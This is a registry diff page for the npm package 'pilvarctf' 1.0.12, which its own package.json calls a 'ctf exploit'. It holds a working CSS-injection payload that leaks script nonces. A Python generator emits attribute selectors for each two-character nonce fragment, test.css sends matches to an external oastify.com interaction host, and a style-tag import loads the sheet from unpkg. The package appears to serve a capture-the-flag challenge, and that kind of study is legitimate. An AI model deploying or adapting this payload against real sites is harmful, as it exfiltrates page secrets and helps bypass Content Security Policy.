pilvarctf 1.0.12

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of pilvarctf might be problematic. Click here for more details.

package/aylmao ADDED
File without changes
package/createfiles.py ADDED
@@ -0,0 +1,9 @@
1
+
2
+
3
+ charset = "abcdefghijklmnopqrstuvwxyz0123456789"
4
+
5
+ for i in range(3,17):
6
+ for c1 in charset:
7
+ for c2 in charset:
8
+ dual = c1 + c2
9
+ "script[nonce*='"+dual+"']{background-image:url('https://unpkg.com/pilvarctf@"+ver+"/leaks/"+str(i)+"')}"
package/nice ADDED
File without changes
package/notes ADDED
@@ -0,0 +1,3 @@
1
+ <style>
2
+ @import url('https://unpkg.com/pilvarctf@1.0.7/test.css')
3
+ </style>
package/package.json ADDED
@@ -0,0 +1,11 @@
1
+ {
2
+ "name": "pilvarctf",
3
+ "version": "1.0.12",
4
+ "description": "ctf exploit",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "echo \"Error: no test specified\" && exit 1"
8
+ },
9
+ "author": "",
10
+ "license": "ISC"
11
+ }
package/test.css ADDED
@@ -0,0 +1,2 @@
1
+ script[nonce*='a'] { display:block; background-image: url('https://ld270otmwov0g7d7kk5lg666nxtohi57.oastify.com/nice') }
2
+ @import url('https://ld270otmwov0g7d7kk5lg666nxtohi57.oastify.com/plzno')